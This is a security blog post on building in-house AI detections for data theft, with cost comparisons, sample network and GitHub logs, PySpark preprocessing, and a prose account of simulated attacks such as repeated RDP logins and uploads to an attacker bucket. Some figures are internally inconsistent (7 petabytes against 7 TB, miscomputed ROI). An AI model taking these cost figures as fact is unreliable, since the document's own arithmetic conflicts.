Breaches Cost Millions! Build AI Detections from NHI + Network logs

Executive Summary

Imagine pouring years of hard-work into your idea, only to have your work stolen overnight. Every person and computer in your company is a target, finance with unreleased quarterly results, engineering with blueprints, development with new source code or a journalist with the latest story.

That nightmare has been the reality for all businesses, startups and every-day people. Just recently, OpenAI accused Chinese startup DeepSeek of stealing its proprietary tech. Data breaches are hitting harder than ever, with the average breach costing $4.88 million in 2024 and IP-specific losses reaching $173 per record.

This article covers something for everyone

Business Strategy
Market Analysis
Technical Implementation

The end result, capabilities which leverage the power of modern AI models to detect data leakage.

Into Business? Jump to Business Case…
Into the Techy Stuff? Jump to Proof of Concept ..

Commercially available AI development tools make it possible to invest in lean AI Engineering teams to compliment Cybersecurity blue team capabilities at a fraction of cost of Third Party Software.

In some cases, emerging AI detection companies (series A/B/C etc.) may offer pricing and innovation that would compliment custom detections as well. Although, current Third Party software companies appear bloated in valuation and I expect those offering “loss leaders prices” will increase prices to hedge losses. All this to say, the “build-it” strategy makes sense in some circumstances.

To understand if “the juice is worth the squeeze”, I demonstrate how your team can train and deploy AI models that monitor non-human identity (NHI) and network behavior across highly dimensional data sets and detect indicators of a data loss.

PoC Example: AI Detecting Data Theft

Business Case

Is there a business case for building out your own AI Security team?

That depends.

Assuming you run lean and only build out core detective capabilities and automation, I estimate [2] FTEs and a cost of around $250k-$300k annually for R&D and cloud costs.

In this case, yes you can make the business case, build-it provides $100k-$400k in cost avoidance annually.

To build a more fully featured Web UI and more advanced AI models, I’d estimate $650-$800k in the first year and $400k thereafter.

In this case, maybe $250k-$500k cost avoidance over 3 years but that is weighed against advancing innovation from the Vendor.

Comparatively, emerging companies annual cost range from total cost of ownership of $400,000 – $750,000 annually including the vendor costs and FTEs needed to support company integration and ongoing maintenance. Not including the expected price increase as vendor lock-in sets in.

To calculate the ROI, estimate the total monetary impact to net-income if the data is lost or assume the total losses from a compliance or regulatory fine.

For example, if your company suffers lost of proprietary software that results in $1,000,000 loss, then $1,000,000 – $300,000 / $300,000 (230% ROI) “build-it” may be worth it; whereas $1,000,000 – $750,0000 / $750,000 (33% ROI) “buy-it” may not be worth the squeeze.

Although these are possible tangible benefits, the case does not cover the intangibles of building out a capability yourself, such as privacy, data security and building out core AI capabilities that are a strategic product advantage.

Buy (Emerging Third Party Companies)

Firstly, let’s evaluate the build-vs-buy decision. From my research, we can assume an annual cost between $200,000-$500,000 while in series A/B funding. For technology and SaaS companies, modest increases in the range of 5% to 15% have been reported in some cases (McKinsey/Bain). When concluding the total cost of ownership, likely includes [1-2] engineering FTEs for integration, configuration. Let’s assume [1] engineer in United States and [1] engineer in Asia to provide 24 hour coverage and offset U.S. labor costs. We can reasonably conclude that total cost may be $400,000 – $750,000 annually.

Side note, these figures are estimates from external sources and can change based on negotiation, contract length, and added services. Please only use these numbers as a rough guide as I cannot engage in NDA and publish price points publicly.

Darktrace https://darktrace.com/

Solution: Darktrace Enterprise Immune System (Cyber AI Platform) uses unsupervised machine learning to detect anomalous behavior across networks, endpoints, and cloud environments. It’s widely cited for detecting sophisticated threats including data exfiltration and insider IP theft.

Estimated Annual Cost: For a medium‑sized enterprise, deployments are sometimes reported in the range of $150,000 to $300,000 per year, with larger or more complex environments potentially exceeding $500,000 annually.

Vectra AI https://www.vectra.ai/

Solution: Cognito Platform
Overview: Focuses on network threat detection and response by analyzing traffic patterns with AI, which can include early indicators of data breaches and IP exfiltration.

Estimated Annual Cost: Typical subscription costs for mid‑market to larger enterprises may fall between $100,000 and $400,000 per year.

Digital Guardian https://www.digitalguardian.com/

Solution: Digital Guardian Data Loss Prevention (DLP) with AI‑enhanced threat detection
Overview: Provides endpoint and network data protection with a focus on preventing data loss and intellectual property theft; AI components help identify anomalous user behavior and data movement.

Estimated Annual Cost: For enterprise-scale licensing, annual pricing is often in the range of $100,000 to $350,000, though deployments can vary widely.

Exabeam https://www.exabeam.com

Solution: Exabeam Advanced Analytics Platform (combining UEBA and SIEM capabilities)

Overview: Uses machine learning to model typical user and entity behavior, detecting anomalies that may indicate insider threats or data breaches.

Estimated Annual Cost: Smaller deployments might start around $100,000 per year, with larger or more comprehensive implementations scaling upward toward $300,000 or more.

Build-It

LOW-END

Let’s assume the most basic detection capabilities, which I will demonstrate later. By this, I mean no Web UI, no multi tenancy just simple ETL processes which transform audit log data from security data lakes and use low-code/no-code solution to build out detections without much need for custom Jupyter notebooks Spark, or Tensor flow engineering work.

You will most likely want to build custom detections for Slack, GSUITE, Office 365, Entra and Network. You may leverage existing solutions such as EDR or CASB to feed into custom made detections.

We can assume you would want at least [5] models for each solution and then potentially another [5] models which combines network behavior with identity and app behavior.

I’d estimate [2] FTES, possibly [1] FTE for ETL and model training and [1] [FTE] for cloud provisioning, configuration and automation of the ETL and API models. Continuous tuning of the models, analysis of the models and features, improvements to data pre-processing. As time frees. the effort can be placed into building automated containment actions based on AI inferences.

Let’s assume you process [7] Petabytes every three months, that will need to be stored in cloud storage, use ETL such as Amazon Glue, and then store to reduced training data in cloud storage and train the model and run the inference 24/7 on batch or real time reduced data.

Below is an example comparison table that shows approximate annual cloud resource costs for processing 7 TB of data per quarter—with data older than 30 days moved to cold storage—and two scenarios for staffing costs (one at $200,000 and one at $250,000 per year). These cloud costs are based on our earlier estimates:

Cloud Provider	Annual Cloud Cost	Total Annual Cost (with $200K Staffing)	Total Annual Cost (with $250K Staffing)

AWS

$41,660

$41,660 + $200,000 = $241,660

$41,660 + $250,000 = $291,660

Azure

$41,384

$41,384 + $200,000 = $241,384

$41,384 + $250,000 = $291,384

GCP

$41,720

$41,720 + $200,000 = $241,720

$41,720 + $250,000 = $291,720

HIGH-END

On the high end, if we wanted Web UI, more advanced AI algorithms which support temporal time series insights with higher feature dimensionality, then we’d be investing in more labor costs to write custom Jupyter notebooks to train and deploy GNN and LSTM models.

I’d estimate [1] engineer for the Web UI, [2] Engineers for AI development, training and tuning. [1] engineer for cloud automation and deployment and likely need for [1] architect and strategist. We can assume [2] U.S. or Europe based resources and [3] Asia based resources.

We can also assume that additional compute is needed to host the Web UI, CICD is needed to deploy the site and automate the training and model deployments, in addition compute resources for Jupyter notebooks training and similar technical requirements for cloud storage, processing and inference model hosting.

Cloud Provider	Estimated Annual Cloud Cost	Total Annual Cost (with $600K Staffing)	Total Annual Cost (with $700K Staffing)

AWS

$50,000

$650,000

$750,000

Azure

$48,000

$648,000

$748,000

GCP

$52,000

$652,000

$752,000

Technical Proof of Concept

Let’s assume, you want to build out your own technical solutions to detect data loss and avoid the financial risk of Third Party software costs and vendor lock-in.

What would that look like from a technical perspective?

Security Data Lake

In my proof of concept, I build out two data feeds consisting of network telemetry data and identity data from common Developer systems (Github/CICD). We can use the identity logs and the network telemetry data to build our detective AI models.

Network Logs

For example, you may want to store network communication traffic in your security data lake in order to train your models normal and abnormal communication patterns such as data leakage.

This data can come from a variety of sources such as Firewalls, Proxies, Flow logs, CASBs etc.

srcaddr	dstaddr	srcport	dstport	protocol	packets	bytes
172.31.75.40	172.31.70.220	2049	58546	6	11	2399
172.31.70.220	172.31.75.40	58546	2049	6	15	3159
172.31.68.79	20.102.38.122	62462	443	6	12	4995
172.31.68.79	140.82.113.22	62437	443	6	56	48544
172.31.68.79	20.102.38.122	60952	443	6	15	13985
20.102.38.122	172.31.68.79	443	62426	6	8	5599
140.82.114.23	172.31.68.79	443	62441	6	11	6499

Github Logs (Non-Human Identity Logs)

In this proof of concept, I store some Github CICD audit logs to train the model on the identity behavior of the Developer software running on the network device generating the logs above. In your case, you might want to train a model on the behavior of the employee, a custom application etc.

In more enterprise solutions, we’d likely ingest a number of identity logs for tools such as AD, Entra, Slack, GSUITE, Outlook etc. To demonstrate the idea, I’m using free features in Github to show show we might detect a comprised CICD system that could lead to stolen source code.

username	timestamp	date	branch	git_action	src_ip
secSandman	14:12:31 PST	Feb 9 2025	main	commit	24.x.x.x
secSandman	14:12:18 PST	Feb 9 2025	main	commit	24.x.x.x
secSandman	14:12:07 PST	Feb 9 2025	main	commit	24.x.x.x
secSandman	14:11:54 PST	Feb 9 2025	main	commit	24.x.x.x
secSandman	14:11:42 PST	Feb 9 2025	main	commit	24.x.x.x
secSandman	14:11:30 PST	Feb 9 2025	main	commit	24.x.x.x
secSandman	14:11:18 PST	Feb 9 2025	main	commit	24.x.x.x

Transformation

The data will need to be transformed in both a file format and a structure that our models will accept. For example, CSV and Protobuf are acceptable file formats while some models requires only numeric vectors and fixed features to train.

While some AI models can scale to multiple highly dimensional features. Therefore, we can be creative as to which features, time sequences and data cleansing pre-processing is required to reduce noise and false positive rates.

For simple demonstration, two ETL pipelines were built to create a dataset for the 1.) identity behavior and 2.) for the network behavior of computers where non-human identities run.

Keeping the secret-sauce to myself, I’ll point out, the ETL reads all objects (logs) / (telemetry) from datalake, the ETL hashes any identifiable information to improve privacy, then PySpark is used to create numeric vector counts of features that might be useful in identifying unusual behavior.

Notably, I’m creating two data sets to train two models with the intention that the unique combination of two models improves accuracy of detection across the attack chain.

Pre–Processing Github Audit Logs

#Define the source S3 path for the fixed-date Git logs (e.g., Feb 9, 2025)

source_s3_path = "s3://secsandman-datalake/etl/input/02-09-2025/"

# Read the Git logs as a comma-delimited CSV file with header.
# (Comma is the default delimiter, so the option can be omitted or explicitly set.)
git_logs_df = spark.read.option("delimiter", ",") \
                        .option("header", "true") \
                        .csv(source_s3_path)

# Optional: Trim whitespace from all column names
for col_name in git_logs_df.columns:
    git_logs_df = git_logs_df.withColumnRenamed(col_name, col_name.strip())

# Drop rows that have null values in either 'username' or 'src_ip'
git_logs_df = git_logs_df.na.drop(subset=["username", "src_ip"])

# Hash the username column using sha2 (256-bit) to create an opaque unique identifier.
# This produces a hexadecimal string.
transformed_df = git_logs_df.withColumn("hashed_username", sha2(col("username"), 256))

Pre-Processing Network Telemetry

# Define the source S3 path (raw netflow logs)
source_s3_path = "s3://secsandman-datalake/etl/input/02-08-2025/"

# Read the files as text (Spark auto-decompresses .gz files)
lines_df = spark.read.text(source_s3_path)

# Convert DataFrame to an RDD of strings
lines_rdd = lines_df.rdd.map(lambda row: row.value)

# Remove any header lines (assuming they start with "version")
data_rdd = lines_rdd.filter(lambda line: not line.startswith("version"))

# Define the column names (hard-coded based on known header)
columns = ["version", "account-id", "interface-id", "srcaddr", "dstaddr", "srcport",
           "dstport", "protocol", "packets", "bytes", "start", "end", "action", "log-status"]

# Split each line on whitespace into a list of values
parsed_rdd = data_rdd.map(lambda line: line.split())

Training the Models

Here’s a few models I explored for this proof of concept. I’m intentionally omitting which models I use, their results and the combination of these models and the specific features that improve prediction.

RCF (Random Cut Forest)

Best for quick, unsupervised anomaly detection on static, aggregated numeric data.
Pros: Ease of use, scalability, minimal pre-processing beyond aggregation.
Cons: Doesn’t model time, may require tuning, and can be less interpretable.

LSTM (Long Short Term Memory)

Best for scenarios where temporal dynamics and sequences are essential to capture anomaly behavior.
Pros: Excellent for sequential data, flexible modeling capabilities.
Cons: Requires more data and careful sequence preparation, is computationally intensive, and can be complex to train and tune—especially if your data is not naturally sequential.

IP Insights

Best for environments specifically focused on Identity + IP anomaly detection with strictly defined 2-dimensional input.
Pros: Domain-specific optimizations, easy integration with managed SageMaker services, minimal configuration beyond ensuring the right input shape.
Cons: Rigid input requirements and less flexibility if your data or anomaly definitions change.

Detecting Account Compromise and Data Leakage

Signaling “Unusual” GitHub Identity Behavior

To test the models, I used VPN to log into various regions across the United States that would normally not use to access Github or RDP into the target CICD machine.

As you may know, the source IP communication will appear to be the IP of the VPN network.

I run a custom script, which automatically interacts with the GitHub API every 5 minutes performing various actions. This behavior will force various characteristics that the AI model may evaluate.

The unusual source IP
The unusual time of day the action is taken
The Git actions (push, pull, commit, clone)
The account being used
The frequency of the actions
Errors / Response Codes

These identity actions are merely example and could be anything based on the behavior of identity and the available data sets. A real-world application use-case would likely be more complex with many attributes and a need to control for dynamic nature of new identities and computer hosts, spurious correlation, seasonality and heterogeneity.

Example: Script Forcing Unusual GitHub Behavior

Signaling “Unusual” Server Admin RDP Behavior

From the same unusual VPN locations, I attempt to RDP into the target Github runner machine that is accessing the “imaginary source code” i.e. the intellectual property.

I run a script which automates repeated login attempts from an the VPN IP address as the Windows System Administrator.

This behavior will force some important characters that the AI model may evaluate.

The unusual source IP
The unusual time of day the action is taken
The network Accept/Reject (toggle network ACLs on and off)
Network telemetry data

Signaling Data Exfiltration

Finally, from the the CICD machine in question. I attempt to upload various sized file from the local machine to to both AWS S3 and GDRIVE. Actions that are a-typical compared to the day-today CICD automation in GitHub actions (clone, execute power shell, update local branch, push code back). This behavior of “Data Theft” is Forcing network communication from the CICD host to the new destinations such as “Attackers Bucket”.

This behavior may signal either data exfiltration or command and control behavior.

AI Threat Detection

The “fake attacker logs” generated from the previous section mimic possible data leakage and possible attacks on our GitHub CICD system. We can then feeds these events to our AI models inference endpoints (APIs) and receive anomaly scores which should in return indicate whether these events are worth investigating further.

To leverage our AI APIs, I build two “live event” pre-processing pipelines which handle the incoming log events and transforms them in a manner that is compatible with the AI inference API.

In other-words, the AI API needs to receive the data in the same format in which it was trained.

GitHub Identity Events –> Transformation –> AI Inference
Host Network Events –> Transformation –> AI Inference

Example: Transformed Network Events Data Feed

920548008	325259033	-1929623325	8	208	125758	31.0	8
920548008	-834910768	-1929623325	13	311	233528	31.0	13
1464271538	920548008	-1929623325	1	9	6704	31.0	1
920548008	379774092	-1929623325	5	661769	2604323	31.0	1
920548008	1075262734	-1929623325	1	8	1124	31.0	1
920548008	-453642178	-1929623325	3	29	6980	31.0	3
920548008	902914720	-1929623325	1	944	309639	31.0	1
-1285531185	920548008	-1929623325	5	1135	1629802	31.0	1
920548008	-1285531185	-1929623325	5	140	10327	31.0	5
325259033	920548008	-1929623325	8	177	70545	31.0	1
902914720	920548008	-1929623325	4	3248	331556	31.0	1

Github Identity Scores

Network Telemetry Scores

analyzing ai anomly scores

When we analyze the proof of concept data sets, the application identity behavior anomaly scores exhibit a bimodal distribution.

One cluster shows very low (more negative) scores, around –13 to –14, while another cluster centers near 0.16 to 0.20, with occasional outliers around –2.77 and 0.11.

This spread suggests that under normal conditions, most application identity events fall into these two distinct groups, but events with scores exceeding two standard deviations above the mean in either cluster may indicate anomalous account behavior—potentially a sign of compromise.

In this case, when an account performs unusual actions on the Github CICD systems, the anomaly score increases.

In parallel, the network anomaly scores, which capture unusual network communications that could signal data leakage or theft, also display their own distribution pattern, with many scores clustering in the 1–2 range.

In this case, when an the host computer performs unusual network activity to and from the Github CICD systems, the anomaly score increases.

When we combine identity and network feeds, and map the same hashed identifier appears in both data sets with anomaly scores that are significantly above the respective distribution’s mean (i.e., more than two standard deviations), there is a strong correlation suggesting that the account in question might not only be compromised at the application identity level but is also exhibiting network behavior consistent with data exfiltration.

Strong correlation suggesting that the account in question might not only be compromised at the application identity level but is also exhibiting network behavior consistent with data exfiltration.

To sum things up, this dual anomaly across identity and network telemetry serves as an indicator for further investigation into potential account compromise and data leakage incidents. The goal is to evaluate an entire attack chain, since attack typically occurs in chain of events in various technologies and systems over time (high dimensionality and temporal events).

If you’re crazy enough to make it this far, I hope you enjoyed content as much as I enjoyed making it.

— Happy Hunting